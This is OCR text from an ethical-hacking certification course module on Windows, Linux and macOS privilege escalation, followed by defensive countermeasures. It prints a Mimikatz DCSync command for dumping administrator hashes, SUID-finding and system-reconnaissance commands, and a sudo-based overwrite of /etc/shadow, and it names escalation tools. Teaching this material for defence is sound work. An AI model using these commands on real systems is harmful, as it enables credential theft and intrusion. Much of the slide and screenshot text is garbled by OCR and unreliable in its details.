Figure 6.123: Illustration of the DCSync attack
Module 06 Page 747
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Tools for Performing a DCSync Attack =
Mimikatz
Source: https://github.com Mimikatz is a command-line tool that allows attackers to obtain credentials from registry memory locations. Attackers leverage mimikatz to perform DCSync attacks. Mimikatz includes a DCSync command that utilizes the Microsoft Directory Replication Service Remote Protocol (MS-DRSR) to replicate the behavior of a legitimate DC. Attackers execute the following command to retrieve the NTLM administrator account: mimikatz
“lsadump::dcsync
/domain:
(domain
password hashes of an
name)
/user:Administrator”
Figure 6.124: Screenshot of Mimikatz
Module 06 Page 748
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Other Privilege Escalation Techniques Access Token Manipulation
CE H
Windows uses access tokens to determine the security context of a process or thread
|
Attackers can obtain access tokens of other users or generatespoofed tokens to escalate privileges and perform
malicious activities while evading detection
|G The appropriate PPID can be set to the process that is derived from theSYSTEM through system processes such as
Parent PID
|
Application
Shimming
|@ The Windows Application Compatibility Framework called Shim is used toprovide compatibility between older and newer | _ versions of Windows | Shims such as RedirectEXE, injectDLL, and GetProcAddress can be used by attackers to escalate privileges, install backdoors,
Filesystem
| @ ifthe filesystem permissions of binaries are not properly set, an attacker canreplace the target binary with a malicious file
Spoofing
Permission
Weakness
Path Interception
svchost.exeor consent.exe using the Windows UAC security feature
|@ Attackers abuse these methods to bypass security mechanisms thatrestrict process spawning from the parent and maintain persistence to elevate their privileges
| @ ifthe process that is executing this binary has higher-level permissions, then the malicious binary is also executed with
higher-level permissions
|
| Applications include many weaknesses and misconfigurations such as unquoted paths, path environment variable misconfiguration, and search order hijacking, which lead to path interception @ Path interception helps an attackermaintain persistence on a system and escalate privileges
Other Privilege Escalation Techniques (Cont'd) ngity busi sibil Acces Fostares
SID-History Injection CoM
Hijacking Scheduled tr. cee i ‘asks in Windows Scheduled
Tasks in
Linux
Module 06 Page 749
CE H
|@ Attackers create persistence and escalate privileges by embedding andrunning malicious code within Windows accessibility features
|@ Attackers gain escalated privileges by replacing one of the accessibility features withcmd.exeor by replacing
binaries in the registry to gain backdoor access |@ The Windows Security Identifier (SID) is a unique value assigned to each user and group account issued by the | domain controllerat the time of creation | Attackers abuse this feature to inject the SID value of an administratoror equivalent account that has higher privileges into the compromised user account's SID-history |@_ The COM hijacking process involves tampering with object references or replacing them with malicious content in the |
|
= |
Windows registry
|@_ When a user executes that commonly used object, the malicious code is automatically executed, allowing attackers to maintain persistence and escalate the privileges given to the object |G Windows Task Scheduler, along with utilities such as “at” and “schtasks,” can be used to schedule programs that can be executed at a specific date and time
@
The attacker can use this technique toexecute malicious programs at system startup, maintain persistence, perform
@
Linux utilizes “cron” or a “crond,” an instruction-based utility,for automating task scheduling
remote execution, escalate privileges, etc.
| Attackers escalate system privileges by making changes to the scripts executed by cron located at/ete/crontab
| Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Other Privilege Escalation Techniques (Cont’d)
CE H
|@ Launchd is used in macOS boot up to complete the system initialization process by loading parameters for each launch-on-demand system-level daemon |@ Daemons have plists that are linked to executables that run at start up |@ The attacker can alter the launch daemon’s executable to maintain persistence or to escalate privileges
Terence Daemon
@ Plist files in macOS describe when programs should execute, the executable file path, the program
Plist
Modification
Setuid and Setgid
Web Shell
parameters, the required OS permissions, etc.
|@ Attackers alter plist files to execute malicious code on behalfof a legitimate user to escalate privileges @ In Linux and macoS, if an application uses setuid or setgid then the application will execute with the privileges of the owning user or group |@ Anattacker can exploit the applications with the setuid or setgid flags to execute malicious code with elevated privileges |@ AWeb shell is a web-based script that allows access to a web server
|@ Attackers create web shells to inject malicious script on a web server to maintain persistent access and
escalate privileges
Abusing Sudo Rights
@ Sudois a UNIX and Linux based system utility that permits usersto run commandsas a superuser or root using the security privileges of another user @ Attackers can overwrite the sudo configuration file, /ete/sudoers with their own maliciousfile to escalate privileges Abusing SUID and SGID Permissions
@ SUID andSGID are access permissions given to a program file in Unix based systems @
Attackers can use executable commands
with SUID and SGID bits enabled to escalate privileges
Kernel Exploits
@ Kernel exploitsare referred to as the programs the can exploit vulnerabilities presentin the kernel to. execute arbitrary commands or code with higher privileges @ Attackers can attain superuser access or root-level accessto the target system by exploiting kernel vulnerabilities
Other Privilege Escalation Techniques =
Access Token Manipulation In Windows OSs, access tokens are used to determine the security context of a process or thread. These tokens include the access profile (identity and privileges) of a user associated with a process. After a user is authenticated, the system produces an access
Module 06 Page 750
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
token. Every process the user executes makes use of this access token. The verifies this access token when a process is accessing a secured object.
system
Any Windows user can modify these access tokens so that the process appears to belong to some other user than the one who started it. Then, the process acquires the security context of the new token. For example, Windows administrators have to log on as normal users and need to run their tools with admin privileges using token manipulation command “runas.” Attackers can exploit this to access the tokens of other users, or generate spoofed tokens, to escalate privileges and perform malicious activities while evading detection. =
Parent PID Spoofing Attackers attempt to bypass the internal process or service that tracks security measures and to escalate privileges by spoofing the parent process ID (PPID) of a recently added process. These new processes are derived directly from their parent if they are not specified precisely. An explicit specification can be made by providing a PPID for the new process via the CreateProcess API. Usually, this API call process consists of specific arguments to determine the particular PPID to be used. The appropriate PPID can be set to the process that is derived from the system through
system processes such as svchost.exe Or consent. exe using Windows User Account
Control (UAC). Attackers abuse these methods to bypass security mechanisms that restrict process spawning from a parent, tools that analyze parent-child relationships, and maintain persistence to elevate their privileges. =
Application Shimming The Windows OSs use a Windows Application Compatibility Framework called shims to provide compatibility between the older and newer versions of Windows. For example, application shimming allows programs created for Windows XP to be compatible with Windows 11. Shims provide a buffer between the program and the OS. This buffer is referenced when a program is executed to verify whether the program requires access to the shim database. When a program needs to communicate with the OS, the shim database uses API hooking to redirect the code. All the shims installed by the default Windows installer (sbinst.exe) are stored at %WINDIR%\AppPatch\sysmain. sdb hk1lm\software\microsoft\windows
nt\currentversion\appcompatflags\installedsdb
Shims run in user mode, and they cannot modify the kernel. Some of these shims can be used to bypass UAC (RedirectEXE), inject malicious DLLs (InjectDLL), capture memory addresses (GetProcAddress), etc. An attacker can use these shims to perform different attacks including disabling Windows Defender, privilege escalation, installing backdoors, etc.
Module 06 Page 751
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking =
Exam 312-50 Certified Ethical Hacker
Filesystem Permission Weakness Many processes in the Windows OSs execute binaries automatically as part of their functionality or to perform certain actions. If the filesystem permissions of these binaries are not set properly, then the target binary file may be replaced with a malicious file, and the actual process can execute it. If the process that is executing this binary has higher-level permissions, then the binary also executes under higher-level permissions, which may include SYSTEM. Attackers can exploit this technique to replace original binaries with malicious binaries to escalate privileges. Attackers use this technique to manipulate Windows service binaries and self-extracting installers.
=
Path Interception Path interception is a method of placing an executable in a particular path in such a way that the application will execute it in place of the legitimate target. Attackers can exploit several flaws or misconfigurations to perform path interception like unquoted paths (service paths and shortcut paths), path environment variable misconfiguration, and search order hijacking. Path interception helps an attacker to maintain persistence on a system and escalate privileges.
=
Abusing Accessibility Features Attackers create persistence and escalate privileges by embedding and running malicious code within Windows accessibility features. Accessibility features are activated using key combinations even before a user logs into a system. An attacker can manipulate these features to obtain backdoor access without logging into the system. In a Windows environment, these programs are stored at the location Cc: \Windows\System32\ and can be launched by pressing specific keys during a system reboot. Attackers gain escalated privileges by replacing one of the accessibility features with cmd.exe or by replacing binaries in the registry to gain backdoor access when a key combination is pressed at the login screen. This technique allows attackers to obtain system-level access. The following are other accessibility features abused by attackers:
=
o
On-screen keyboard: C: \Windows\System32\osk.exe
o
Magnifier: c: \Windows\System32\Magnify.exe
o
Narrator:
o
Display switcher: C: \Windows\System32\DisplaySwitch.exe
o
App switcher: c: \Windows\System32\AtBroker.exe
o
Sticky keys:
Cc: \Windows\System32\Narrator.exe
C: \Windows\System32\sethc.exe
SID-History Injection
In Windows, Windows Security Identifier (SID) is a unique value assigned to each user and group accounts issued by the domain controller (DC) at the time of creation. These
Module 06 Page 752
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
AD accounts can store multiple SID values in the SID-history attribute, which are used when migrating the user from one domain to another. Attackers abuse this feature to inject the SID value of an administrator or equivalent account containing higher privileges into the compromised user account’s SID-history attribute. This injection could elevate the user account privileges, using which the
attacker can access restricted resources or remote systems. Attackers can also access other domain resources by performing further movement techniques such as remote services, SMB/Windows admin shares, or Windows remote management. =
COM Hijacking The Component Object Model (COM) is an interface module in Windows environments that enables a software component to interact with another software component’s code without being aware of their actual implementation. Attackers exploit COM objects by hijacking their valid references and adding their own references to infect the target system and achieve persistence. This process involves tampering or replacing object references with malicious content in Windows Registry. When a user executes that commonly used object, the malicious code is automatically executed, allowing attackers maintain persistence and escalate the privileges given to the object.
Attackers might use the following techniques while performing COM hijacking: o
By taking advantage of the registry loading process and creating a malicious user object under the HKEY_CURRENT_USER\Software\Classes\CLSID\ registry, which is loaded by the system before loading the
HKEY
=
LOCAL MACHINE\SOFTWARE\Classes\CLSID\ registry
o
By interchanging existing DLLs or executable names with malicious payloads that will be executed when legitimate DLLs or executables are executed
o
By taking advantage of orphan requests made by the system components that are not yet defined in the registry, creating malicious COM objects for those requests in the HKEY_CURRENT_USER registry and mapping them to the malicious payloads hidden in the file system
Scheduled Tasks in Windows Scheduled tasks allow users to perform routine tasks chosen for a computer automatically. Windows includes utilities such as at and schtasks. A user with administrator privileges can use these utilities in conjunction with Task Scheduler to schedule programs or scripts that can be executed at a particular date and time. If a user provides proper authentication, they can also schedule a task from a remote system using a Remote Procedure Call (RPC). An attacker can use this technique to execute malicious programs at system startup, maintain persistence, perform remote execution, escalate privileges, etc.
=
Scheduled Tasks in Linux Linux utilizes cron or a crond, an instruction-based utility, for automating task scheduling. Attackers abuse this utility for triggering a malicious payload when a specific
Module 06 Page 753
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
task is scheduled to be executed. This scheduler assists users with administrator privileges in configuring cron and executing a monotonous cron job at a specific time. cron executes all the commands from the crontab file located at its root, /etc/crontab. Attackers escalate system privileges by making changes to the scripts executed by cron located at /etc/crontab. By modifying these scripts, attackers can force malicious scripts to be executed automatically during system reboot for gaining root privileges. Command
Description
crontab
|
Installs or modifies the crontab file
crontab
-1
Displays currently running crontabs
crontab
-r
Deletes the crontab file
crontab -r crontab
-e
crontab
-u
Deletes the crontab of the specified user Schedules software updates/modifies the crontab .
file of the current user
-e
Modifies the crontab of the specified user Table 6.12: List of cron commands
=
Launch Daemon During the macOS booting process, launchd is executed to complete the system initialization process. Parameters for each launch-on-demand system-level daemon found in /System/Library/LaunchDaemons and /Library/LaunchDaemons are loaded using launchd. These daemons have property list files (plist) that are linked to executables that run at the time of booting. Attackers can create and install a new launch daemon, which can be configured to execute at boot-up time using launchd or launchctl to load plist into the relevant directories. The weak configurations allow an attacker to alter the existing launch daemon’s executable to maintain persistence or to escalate privileges.
=
Plist Modification In macOS, plist (property list) files include all the necessary information that is needed to configure applications and services. These files describe when programs should execute, the executable file path, program parameters, essential OS permissions, etc. The plist files are stored at specific locations like /Library/Preferences (which execute with high-level privileges) and ~/Library/Preferences (which execute with user privileges). Attackers can access and alter these plist files to execute malicious code on behalf of a legitimate user, and further use them as a persistence mechanism and to escalate privileges.
=
Setuid and Setgid In Linux and macOS, if an application uses setuid or setgid, the application will execute with the privileges of the owning user or group, respectively. Generally, the applications run under the current user’s privileges. There are certain circumstances where the
Module 06 Page 754
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
programs must be executed with elevated privileges but the user running the program does not need the elevated privileges. In this scenario, one can set the setuid or setgid flags for their applications. An attacker can exploit the applications with the setuid or setgid flags to execute malicious code with elevated privileges. =
Web Shell A web shell is a web-based script that allows access to a web server. Web shells can be created in all OSs like Windows, Linux, and macOS. Attackers create web shells to inject a malicious script on a web server to maintain persistent access and escalate privileges. Attackers use a web shell as a backdoor to gain access and control a remote server. Generally, a web shell runs under the current user’s privileges. Using a web shell, an attacker can perform privilege escalation by exploiting local system vulnerabilities. After escalating privileges, an attacker can install malicious software, change user permissions, add or remove users, steal credentials, read emails, etc.
=
Abusing Sudo Rights Sudo (substitute user do) is a UNIX- and Linux-based system utility that permits users to run commands as a superuser or root by using the security privileges of another user. An
/etc/sudoers
file
includes
the
configuration
of sudo
rights.
detailed information regarding access permissions, including allowed to run with or without passwords per user or group.
This
file
commands
contains
that
are
Attackers can abuse sudo to escalate their privileges to run programs that the normal users are not allowed to run. For example, if an attacker has sudo-rights to run a cp command
then
he/she
can
overwrite
an
/etc/sudoers
or /etc/shadow
file with
his/her own malicious file. By overwriting the content of the sudoers file, he/she can edit the permissions to run various restricted commands or programs to launch further attacks on the system.
=
Abusing SUID and SGID Permissions Set User Identification (SUID) and Set Group Identification (SGID) are access permissions given to a program file in UNIX-based systems. These permissions usually allow the users on the system to run a program with temporarily elevated privileges or root privileges to execute a particular task. The files with SUID and SGID rights run with higher privileges. In Linux, there are some commands and binaries that can be executed by the attackers to elevate their privileges from non-root users to root users, if flags of SUID and SGID rights are set. Some of the executable commands that can be used by attackers to spawn a shell and escalate privileges are nmap, vim, less, more, bash, cat, cp, echo, find, nano, etc. Attackers can use the following commands to find SUID and SGID files in the target system: # Find SUID find
/
-perm
-u=s
-type
f
2>/dev/null
# Find GUID
Module 06 Page 755
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking find
=
/
-perm
Exam 312-50 Certified Ethical Hacker
-g=s
-type
f
2>/dev/null
Kernel Exploits Kernel exploits refer to programs that can exploit vulnerabilities present in the kernel to execute arbitrary commands or code with higher privileges. By successfully exploiting kernel vulnerabilities, attackers can attain superuser or root-level access to the target system. To run a kernel exploit, attackers must have configuration details of the target system. Attackers use the following commands to obtain details such as the OS, kernel version, and architecture of the target system: #OS cat
/etc/issue
# Kernel version uname
-a
# Architecture cat
/proc/version
Attackers search https://www.exploit-db.com and execute Python linprivchecker.py to detect kernel exploits for escalating privileges.
Module 06 Page 756
scripts
such
as
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Privilege Escalation Tools BeRoot
|
CE H
BeRoot is a post-exploitation tool to check common misconfigurations
linpostexp
to find a way to escalate privileges
|
linpostexp tool obtains detailed information onthe kernel, which can be used to escalate
privileges on the target system
"tes Peithab. com Other Privilege
Escalation Tools:
PowerSploit
—_tts://github.com
FullPowers
tts: fita.com
PEASS-ng.
https: ithbscom
Copyright © by
Windows Exploit Suggester
tps://oktub.com
Al Rights Reserved. Reproduction i
Privilege Escalation Tools Privilege escalation tools such as BeRoot, attackers to run a configuration assessment underlying vulnerabilities, services, file and etc. Using this information, attackers can privileges on the target system. =
linpostexp, Windows Exploit Suggester, etc. allow on a target system to find information about the directory permissions, kernel version, architecture, further find a way to exploit and elevate their
BeRoot
Source: https://github.com BeRoot is a post-exploitation tool to check common escalate privilege.
misconfigurations to find a way to
As shown in the screenshot, using this tool, attackers can obtain information about service permissions, writeable directories with their locations, permissions on startup keys, etc.
Module 06 Page 757
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
(c)
Microsoft
Exam 312-50 Certified Ethical Hacker
inal Corporation.
PHHHHAEEHEHHHAAHE
[!]
True
Permission
Service
to
create
Hi All
rights
reserved
Privilege
Escalation
BANG
!
BANG
#HHHAHHHHHHHHABHE
a service
with
openscmanager
] Binary located on a writable directory
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AarSvc
Full path: C:\Windows
Writable
Nai
directory:
AarSvc
(
stem32\svchost.exe
\Windows\system32
-k AarSvcGroup
-p
permissions: {'change_config': False, ‘start False, 'stop': False} Key: HKEY LOCAL _MACHINE\SYSTEM\CurrentControlSet\Services\AarSvc_24f Full path: C:\Windows\system32\ host.exe -k AarSvcGroup -p Writable directory: ( Windows \ Name: AarSvc_24f3e7
Figure 6.125: Screenshot of BeRoot showing service permissions
Module 06 Page 758
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
msfconsole - Parrot
PHHHHHABHHAHAHA
Startup
[!]
with
Registry
key
Keys
##HHHHAHAAHAAHAHE
writable
access
IHKEY_LOCAL_MACHINE\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
IHKEY_LOCAL_MACHINE\SOFTWARE\
\Microsoft\\Windows\\CurrentVersion’
located on a writable directory
[!] Binary
Name:
\Wow6432Node\
SecurityHealth
Key:
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
Full
path:
Ir
dir
%windir
Windows\system32
ystem32\SecurityHealthSystray.exe
Name: SunJavaUpdateSched Key: SOFTWARE\\Wow6432Node\ \Microsoft\\Windows\\CurrentVersion\\Run \ritable directory: C:\Program Files (x86)\Common Files\Java\Java Update Full path: "C:\Program Files (x86)\Common Files\Java\Java Update\jus
PHHHHHBHHHEAEHHEE ft]
True
mission
(HHH
Taskscheduler to write
~Check
on the
user
d#HHHHHHHHHEHHHE task
directory
indows\system32\ tasks
admin #4HHHHHHAHAAAHHHE
[!] Is user in the administrator group Figure 6.126: Screenshot of BeRoot showing Startup keys and Taskscheduler permissions =
linpostexp
Source: https://github.com The linpostexp tool obtains detailed information on the kernel, which can be used to escalate privileges on the target system. As shown in the screenshot, using this tool, attackers can obtain information about the kernel, filesystems, superuser, sudoers, sudo version, etc. Attackers can use this information to exploit vulnerabilities present in the kernel to elevate their privileges. The following command is used to extract this information about the target system: #python
Module 06 Page 759
linprivchecker.py
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
@arrot @python Linprivche; LINUX PRIVILEGE ESC t*] GETTING BASIC SYSTEM I
+] Kernel Linux version 5.14.6-9parrotl-and64 (team 2.35.2 Pp. GNU ld (GNU Binutils for
org) (gcc-10 (Debian 10.2.1-6) 10.2.1 2021 an 5.14.9-9parrotl (2021-10-26)
} Hostname parrot
I+] Operating system Parrot 0S 5.0 \n \l *) GETTING NETWORKING INFO [+] Interfaces ethd: flags=4163 mtu 1500 255.255.255.8 broadcast 10.10.1 d: dB txqueuele 14.9 MiB) overruns @ frame @ 8 packets 451 31351 (1.6 MiB) errors @ drop 1 © carrier @ flags=73_ mtu 65536
Figure 6.127: Screenshot of linpostexp displaying kernel details GETTING FILESYSTEM INFO...
Mount results sysfs on /sys type sysfs (rw,nosuid,nodev,noexec, relatime) proc on /proc type proc uid, nodev, noexec, relatime) udev on /dev type devtmpfs (rw,nosuid, relatime, size=4018268k,nr_inodes=1004567 ,mode=75! mode=620, ptmxmode=000) devpts on /dev/pts type devpts (rw,nosuid,noexec, relatine, tmpfs on /run type tmpfs (rw,nosuid,nodev,noexec, relatime 313092k mode=755, inode64) /dev/sdal on / type btrfs (rw,noatime,nodiratime, nodatasum,nodatacow, space cache, autodef, rag, subvo| 257, subvol=/@ securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec, relatime) tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev, inode64) tmpfs on /run/lock type tmpfs (rw, nosuid, nodev,noexec, relatime, size=5120k, inode64) cgroup2 on /sys/fs/cgroup type cgroup2 (rw,nosuid, nodev, noexec, relatime,nsdelegate,memory recursi on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec, relatime) none on /sys/fs/bpf type bpf (rw,nosuid,nodev,noexec, relatime,mode=760) systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw, relatime, fd=29, pgrp=1, timeout=0,minprot 5, direct ,pipe_ino=19260) mqueue on /dev/mqueue type mqueue (rw,nosuid, nodev,noex time) huget Lb dev/hugepages type hugetLbfs (rw, relatime, pagesize=2M) fs on /sys/kernel/debug type debugfs (rw,nosuid,nodev, noexec, relatime) /tracing type tracefs (rw,nosuid, nodev, noexec, relatir fuse/connections type fusectl (rw,nosuid,nodev, noexec, relatime) type configfs (rw,nosuid, nodev,noexec, relatime)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,nosuid,nodev,noexec, relatime) tmofs on /run/user/1908_ tvoe tmofs (rw nosuid nodev.relatime. size=813088k_nr_inodes=203272. mode
Figure 6.128: Screenshot of linpostexp showing filesystem info Some additional privilege escalation tools are listed as follows: =
PowerSploit (https://github.com)
=
FullPowers (https://github.com)
=
PEASS-ng (https://github.com)
=
Windows Exploit Suggester (https://github.com)
Module 06 Page 760
‘al Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
How to Defend against Privilege Escalation 1 |
Restrict interactive logon privileges
) | 6 |
Run users and applicationswith the lowest
}
Reduce the amountof code thatruns with a particular privilege
Implement multi-factor authentication and
) |
Perform debugging using bounds checkers and
privileges
authorization
|
|
|
to limit the scope of programming errors and bugs
|
9 |
| |
Use an encryption technique to protect sensitive data
stress tests
Run services as unprivileged accounts Implementa privilege separation methodology
|
CE H
|
Thoroughly test the system for application coding errors and bugs Regularly patch and update the kernel
How to Defend against Privilege Escalation (Cont’d) Use ful y ful y
qualified paths ini all Windows q u a l i f i e d paths indows applications
j11 | Change the UAC settingsto “Always Notify”
F
EE]
EEA
ite ers rom writing es tote sear
CEH
ye
paths for applications
PE]
Continuously monitor file-system permissions
only legitimate administrators can make service
changes
Use whitelisting tools to identify and block
malicious software
protected directories
In macOS, make plist files read-only
using auciting tools
Reduce the privilegesof users and groups so that
eure thst at enecutabes ae paced in rte
;
| 19 |
Block unwanted system utilitiesor software that
may be used to schedule tasks
Regularly the web servers pi ‘gularly ps patch and update
Al Rights Reserved. Reproduction i
How to Defend against Privilege Escalation The best countermeasure against privilege escalation is to ensure that users have the lowest possible privileges that are adequate to use their system effectively. Thus, even if an attacker succeeds in gaining access to a low-privilege account, they will not be able to gain administrative-level access. Often, flaws in programming code allow such escalation of privileges on a target system. As stated earlier, an attacker can gain access to the network using a nonadministrative account and then gain the higher privileges of an administrator. Module 06 Page 761
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
The following are the best countermeasures to defend against privilege escalation: Restrict interactive logon privileges.
Run users and applications with the lowest privileges. Implement multi-factor authentication and authorization. Run services as unprivileged accounts. Implement a privilege separation methodology to limit the scope of programming errors and bugs. Use an encryption technique to protect sensitive data.
Reduce the amount of code that runs with a particular privilege. Perform debugging using bounds checkers and stress tests. Thoroughly test the system for application coding errors and bugs. Regularly patch and update the kernel. Change UAC settings to “Always Notify” to increase the visibility of the user when elevation is requested.
UAC
Restrict users from writing files to the search paths for applications. Continuously monitor file-system permissions using auditing tools. Reduce the privileges of user accounts and groups so that only legitimate administrators can make service changes. Use whitelisting tools to identify directory, or service permissions.
and
block
malicious
software
that
changes
file,
Use fully qualified paths in all Windows applications. Ensure that all executables are placed in write-protected directories. In macOS, prevent plist files from being altered by users by making them read-only. Block unwanted system utilities or software that may be used to schedule tasks. Regularly patch and update the web servers. Disable the default local administrator account. Detect, repair, and fix any flaws or errors running in the system services. Keep the files read-only and require it.
provide write access to only the users and groups that
Incorporate the provisioning and de-provisioning of accounts to prevent the hijacking of orphaned accounts. Enable Data Execution Prevention code request.
Module 06 Page 762
(DEP) in Windows
systems to block any executable
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Defend against the Abuse of sudo Rights Implement a strong password policy for sudo users. Turn off password caching by setting timestamp_timeout to 0 so that users must input their password every time sudo is executed. Separate sudo-level administrative accounts from the administrator’s regular accounts to prevent theft of sensitive passwords. Update user permissions and accounts at regular intervals. Test sudo execution.
users
with
access to programs
containing
parameters
for arbitrary
code
Defend against DCSync Attacks The following are the best countermeasures to defend against DCSync attacks: Examine the permissions assigned to the users and administrators. Keep track of the accounts that request domain replication rights. Conduct security awareness training on the system management, threat detection, and response systems.
configuration,
system
patch
Deploy network surveillance tools such as Sean Metcalf and StealthDEFEND to accumulate DC IP addresses and decide which IP addresses need to be included in the replication list. Defend against PPID Spoofing Verify PPID fields where information is stored to detect irregularities. Identify the legitimate parent process using the event header PID specified by ETW. Periodically analyze Windows API calls such as CreateProcess for malicious PIDs. Monitor system API calls exclusively assigning PPIDs to new processes.
Module 06 Page 763
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Tools for Defending against DLL and Dylib Hijacking
CE H
Dependency Walker Dylib Hijack Scanner |@ Dependency Walker detects many common application | @ Dylib Hijack Scanner is a simple utility that will scan your computer problems such as missing modules, invalid modules, for applications that are either susceptible to dylib hijacking or import/export mismatches, and circular dependency have been hijacked errors
http://w. dependencywolker.com
Trtes objective see com
Tools for Defending against DLL and Dylib Hijacking Cybersecurity professionals can use tools such as Dependency Walker, DLL Hijack Audit Kit, and DLLSpy to detect and prevent privilege escalation using DLL hijacking. In addition, tools such as Dylib Hijack Scanner help security professionals to detect and prevent privilege escalation using Dylib hijacking on macOS systems. These tools help security professionals to monitor system files for modifying, moving, renaming, or replacing DLLs or dylibs in the systems.
Module 06 Page 764
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
‘System Hacking =
Dependency Walker
Source: http://www.dependencywalker.com Dependency Walker is useful for troubleshooting system errors related to loading and executing modules. It detects many common application problems, such as missing modules, invalid modules, import/export mismatches, circular dependency errors, etc. As shown in verify all the missing DLLs, misconfigured
the screenshot, cybersecurity professionals use Dependency Walker to DLLs used by an application, the location from which DLLs are loaded, etc. This information helps security professionals to detect, patch, and fix DLLs in the systems.
4 Dependency Walker - snoopy.exe] a File Edit View Options Profile Window Help SH
RiaAe\as
saa
SEM
Ee GF SNOOPYEXE SO KERNEL2,DLL @ APL-MS-WIN-CORE-RTLSUPPORT-L1-1-0DLL @ APL-MS-WIN-CORE-RTLSUPPORT-L1-2-0DLL O NTL ee GO KERNELBASE.OLL @ APL-Ms-WIN-CORE-PROCESSTHREADSPI-MS-WIN-CORE-PROCESSTHREADS\PI-MS-WIN-CORE-PROCESSTHREADS P|-MS-WIN-CORE-PROCESSTHREADSI-MS-WIN-CORE-REGISTRY-L1-1-0DLL
Ordinal §
|
=
[omna
Fundtion | Entry Point
Function | Entry Point
PI-MS-WIN-CORE-MEMORY-L PI-MS-WIN-CORE-MEMORY-L1-1-2.DLL IN-CORF-HANDIF-I1-1-0.011
Module ‘ABI-MS- WN-CORE-APIOUERY-LT-1-0DLL ‘ADI-MS-WIN-CORE-APPCOMPAT-L1-1-0.DLL ‘ADI-MS-WiIN-CORE-APPCOMPAT-L1-1-1.DLL ‘ADI-MS-WIN-CORE-COMMLLT-1-0LL ‘ADI-MS-WIN-CORE-CONSOLE-L1-1-0DDLL ‘ABI-MS-WIN-CORE-CONSOLE-L1-2-0DDLL AWIN-CORE-CONSOL -WIN-CORE-CONSOL -WIN-CORE-CONSOL \WIN-CORE-CONSOLE-L3-2-01 ‘ABL-MS-WIN-CORE-CRT-LI‘ADI-MS-WIN-CORE-CRT-L2‘ADI-MS-WIN-CORE-DATETIME-Li-1-ODLL @ | apv-ms-win-CORE-DATEMME-L1-1-1.0LL
[ite
Time Stamp [Link Time Stamp Error opening file The system cannot find Error opening file. The system cannot find Error opening file. The system cannot find Error opening file. The system cannot find Error opening file. The system cannot find pening file, The system cannot find paring file. The oyster cannct find opening file. The system cannot find opening file. The system cannot find Error opening file. The system cannot find Error opening file. The system cannot find Error opening file. The system cannot find Error opening file. The system cannot find Error opening file The system cannot find
FileSize [ At. the le pected the fil specified the fil pected the file pected the fil pected the file specified te ile specified the ile specified the ile specified the file specified the file specified the fil specified the fil pected the file pected
@). 2). 2). 2). 2). 2. (2) (2) (2) 2). @). @). 2). 2).
Link Checksum —[ Real Checksum
[Error: Atleast one required implicit or forwarded dependency was not found. |Warning: At least one delay-load dependency module was not found. For Help, press FI Figure 6.129: Screenshot of Dependency Walker
Module06 Page 765
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking =
Exam 312-50 Certified Ethical Hacker
Dylib Hijack Scanner
